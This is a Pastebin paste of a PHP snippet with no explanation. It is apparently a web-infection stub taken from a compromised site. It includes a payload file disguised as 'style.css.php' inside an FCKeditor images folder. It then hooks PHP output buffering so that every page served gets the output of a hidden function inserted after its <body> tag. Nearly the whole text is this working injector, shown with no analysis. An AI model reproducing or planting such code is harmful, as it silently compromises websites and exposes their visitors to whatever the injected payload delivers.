Guest User

Untitled

a guest
Jun 17th, 2018
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.80 KB | None | 0 0
  1. <?php
  2. if (function_exists('ob_start') && ! isset($GLOBALS['sh_no'])) {
  3. $GLOBALS['sh_no'] = 1;
  4. if (file_exists('/home/zendfram/public_html/public/files/js/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php')) {
  5. include_once ('/home/zendfram/public_html/public/files/js/FCKeditor/editor/filemanager/browser/default/images/icons/32/style.css.php');
  6. if (function_exists('gml') && ! function_exists('dgobh')) {
  7. if (! function_exists('gzdecode')) {
  8. function gzdecode ($d)
  9. {
  10. $f = ord(substr($d, 3, 1));
  11. $h = 10;
  12. $e = 0;
  13. if ($f & 4) {
  14. $e = unpack('v', substr($d, 10, 2));
  15. $e = $e[1];
  16. $h += 2 + $e;
  17. }
  18. if ($f & 8) {
  19. $h = strpos($d, chr(0), $h) + 1;
  20. }
  21. if ($f & 16) {
  22. $h = strpos($d, chr(0), $h) + 1;
  23. }
  24. if ($f & 2) {
  25. $h += 2;
  26. }
  27. $u = gzinflate(substr($d, $h));
  28. if ($u === FALSE) {
  29. $u = $d;
  30. }
  31. return $u;
  32. }
  33. }
  34. function dgobh ($b)
  35. {
  36. Header('Content-Encoding:
  37. none');
  38. $c = gzdecode($b);
  39. if (preg_match('/\
  40. <body /si', $c)) {
  41. return preg_replace('/(\<body[^\>]*\>)/si', '$1' . gml(), $c);
  42. } else {
  43. return gml() . $c;
  44. }
  45. }
  46. ob_start('dgobh');
  47. }
  48. }
  49. }
Add Comment
Please, Sign In to add comment